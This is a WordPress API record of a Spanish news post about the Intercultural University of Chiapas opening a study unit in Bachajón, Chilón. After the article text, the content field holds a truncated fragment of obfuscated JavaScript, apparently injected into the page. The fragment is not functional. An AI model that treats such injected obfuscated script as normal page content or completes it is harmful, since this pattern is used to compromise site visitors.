{"id":3470,"date":"2022-07-06T01:54:06","date_gmt":"2022-07-06T01:54:06","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3470"},"modified":"2022-07-06T01:54:07","modified_gmt":"2022-07-06T01:54:07","slug":"se-abrira-unidad-multimodal-de-la-unich-en-el-municipio-de-chilon","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3470","title":{"rendered":"Se abrir\u00e1 Unidad Multimodal de la UNICH en el municipio de Chil\u00f3n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-05-at-5.57.35-PM-1024x682.jpeg\" alt=\"\" class=\"wp-image-3471\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-05-at-5.57.35-PM-1024x682.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-05-at-5.57.35-PM-300x200.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-05-at-5.57.35-PM-768x512.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-05-at-5.57.35-PM-310x205.jpeg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-05-at-5.57.35-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>San Crist\u00f3bal de Las Casas. &#8211; Carlos Ildefonso Jim\u00e9nez Trujillo, presidente Municipal de Chil\u00f3n y Leticia Pons Bonals, rectora de la Universidad Intercultural de Chiapas (Unich), firmaron convenio de colaboraci\u00f3n, con la finalidad de aperturar una Unidad Intercultural Multimodal (UIM), en el ejido Bachajon, de aquel municipio, con las licenciaturas en Desarrollo Sustentable, Derecho Intercultural y Lengua y Cultura, las cuales ya se ofertan en Yajal\u00f3n. \u201cEn este af\u00e1n que tiene nuestra universidad, por abrir m\u00e1s espacios de formaci\u00f3n educativa del nivel superior en distintas localidades donde todav\u00eda no se cuenta con estos espacios educativos, el modelo formativo de la UNICH considera la posibilidad de dar una atenci\u00f3n de calidad a estos sectores poblacionales que les es dif\u00edcil moverse  hacia otras regiones, donde se han concentrado las instituciones de educaci\u00f3n superior y ah\u00ed la necesidad de dise\u00f1ar este plan de atenci\u00f3n y planeaci\u00f3n de la oferta educativa\u201d, dijo la Pons Bonals. Posterior a la firma del convenio de colaboraci\u00f3n, explic\u00f3 que esta es una primera etapa, se prestar\u00e1n los servicios educativos en instalaciones prestadas, con docentes que atender\u00e1n a los estudiantes y que depender\u00e1n de la Unidad Acad\u00e9mica Multidisciplinaria de Yajal\u00f3n, en lo que se va consolidando la matr\u00edcula necesaria para aperturar una unidad en los pr\u00f3ximos a\u00f1os. Por su parte, la Secretaria Acad\u00e9mica de la UNICH, Alma Rosa P\u00e9rez Trujillo, indic\u00f3 que en esta primera etapa se consideran las licenciaturas Desarrollo Sustentable, Derecho Intercultural y Lengua y Cultura, a espera que, de la mano con las autoridades de Chil\u00f3n, se pueda concretar con la Unidad, y aperturar las otras licenciaturas con las que cuenta esta casa de estudios \u201cpero existe un proceso\u201d. Al hacer uso de la palabra, Carlos Ildefonso Jim\u00e9nez Trujillo, presidente Municipal de Chil\u00f3n, agradeci\u00f3 la disposici\u00f3n de las autoridades acad\u00e9micas de la UNICH, y se comprometi\u00f3 a ir cumpliendo con la matr\u00edcula que se requiera, \u201cy hoy arrancamos con 128 y espero que el pr\u00f3ximo hablemos de 200, para poder pasar a la siguiente fase\u201d. \u201cHay muchos j\u00f3venes que se quedan en ese camino intermedio de la educaci\u00f3n, por falta de recursos econ\u00f3micos, y el hecho de acercar la universidad  a Bachaj\u00f3n, se les abre las puertas a estos j\u00f3venes que tienen esta necesidad de seguir aprendiendo, y que no lo pueden.  En nombre del ayuntamiento de Chil\u00f3n, estoy muy agradecido para que hoy estemos con este arranque\u201d, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>San Crist\u00f3bal de Las Casas. &#8211; Carlos Ildefonso Jim\u00e9nez Trujillo, presidente Municipal de Chil\u00f3n y Leticia Pons Bonals, rectora de la Universidad Intercultural de Chiapas (Unich), firmaron convenio de colaboraci\u00f3n, con la finalidad de aperturar una Unidad Intercultural Multimodal (UIM), en el ejido Bachajon, de aquel municipio, con las licenciaturas en Desarrollo Sustentable, Derecho Intercultural &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3471,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-3470","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3470","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3470"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3470\/revisions"}],"predecessor-version":[{"id":3472,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3470\/revisions\/3472"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3471"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3470"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3470"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3470"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}